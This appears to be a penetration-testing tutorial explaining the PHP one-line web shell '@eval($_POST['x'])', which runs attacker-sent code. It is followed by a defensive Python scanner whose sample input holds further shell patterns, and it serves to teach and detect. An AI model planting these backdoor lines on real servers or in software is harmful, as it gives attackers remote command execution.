One-sentence Trojan analysis
First of all, when learning penetration testing, you will probably come across three types of Trojans: "big horses", "small horses", and "one-sentence" Trojans.
A common one-sentence Trojan:
<?php @eval($_POST['x'])?>
This is probably the most common one. Let's look at how it is put together.
First there is the eval function, followed by the value submitted via POST in the parameter x. Let's start with what the eval function does.
Official description:
The eval() function evaluates a string as PHP code.
The string must be valid PHP code and must end with a semicolon.
If no return statement is called in the code string, NULL is returned. If there are parsing errors in the code, the eval() function returns false.
Syntax:
eval(phpcode)
To put it simply, it can execute PHP functions and PHP code. That is all we need to know.
Seen this way, the Trojan is much easier to understand. What happens if we simply send some PHP code in the POST parameter?
For example: the phpinfo() function, the system() function, and so on.
You can see that the phpinfo function I have here has been executed.
Command execution is also possible.
PHP code can also be executed smoothly.
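From the defender's side, the pattern analysed above (a code-execution function such as eval fed with request data such as $_POST['x']) can be searched for in the PHP files of a web root. The following Python scanner is an added example, not part of the original article; the sink list, the function name find_one_sentence_trojans and the sample input are assumptions constructed for illustration, and it is a regex heuristic, not a PHP parser.

```python
import re

# Assumed sink list: functions that run a string as PHP code or as an OS command.
SINKS = ("eval", "assert", "system", "exec", "shell_exec", "passthru")
# Request data that the client fully controls (names are case-sensitive in PHP).
SOURCE = r"\$_(?:POST|GET|REQUEST|COOKIE)\b"

# String literals are kept (group 1); comments are blanked so they cannot fake a hit.
STRING_OR_COMMENT = re.compile(
    r"""('(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")|/\*.*?\*/|(?://|#)[^\n]*""", re.S)
# $var = ... $_POST[...]  (but not == or =>): remember $var as tainted.
ASSIGN = re.compile(r"(\$\w+)\s*\.?=(?![=>])[^;]*?" + SOURCE)
# Function names are case-insensitive in PHP; skip methods ($db->exec) and longer names.
SINK_CALL = re.compile(
    r"(?<![\w$>:])(?i:(" + "|".join(SINKS) + r"))\s*\(((?:[^;?]|\?(?!>))*)")


def find_one_sentence_trojans(php_source):
    """Return (line, sink, reason) for every sink call fed by request data."""
    code = STRING_OR_COMMENT.sub(
        lambda m: m.group(1) or " " + "\n" * m.group().count("\n"), php_source)
    tainted = {m.group(1) for m in ASSIGN.finditer(code)}
    hits = []
    for m in SINK_CALL.finditer(code):
        args = m.group(2)
        if re.search(SOURCE, args):
            reason = "request data passed directly"
        elif any(re.search(re.escape(v) + r"\b", args) for v in tainted):
            reason = "variable assigned from request data"
        else:
            continue
        line = code.count("\n", 0, m.start()) + 1
        hits.append((line, m.group(1).lower(), reason))
    return hits


# Constructed sample input, not taken from any real site.
SAMPLE = """<?php @eval($_POST['x'])?>
<?php
// eval($_GET['c']);  commented out, must not be reported
$cmd = $_REQUEST['cmd'];
SYSTEM($cmd);
eval('return 1;');
$db->exec($_POST['q']);
"""

if __name__ == "__main__":
    for hit in find_one_sentence_trojans(SAMPLE):
        print("line %d: %s() <- %s" % hit)
```

A hit is a lead for manual review, not proof: obfuscated variants will evade a pattern match like this, so it complements file-integrity monitoring and upload restrictions instead of replacing them.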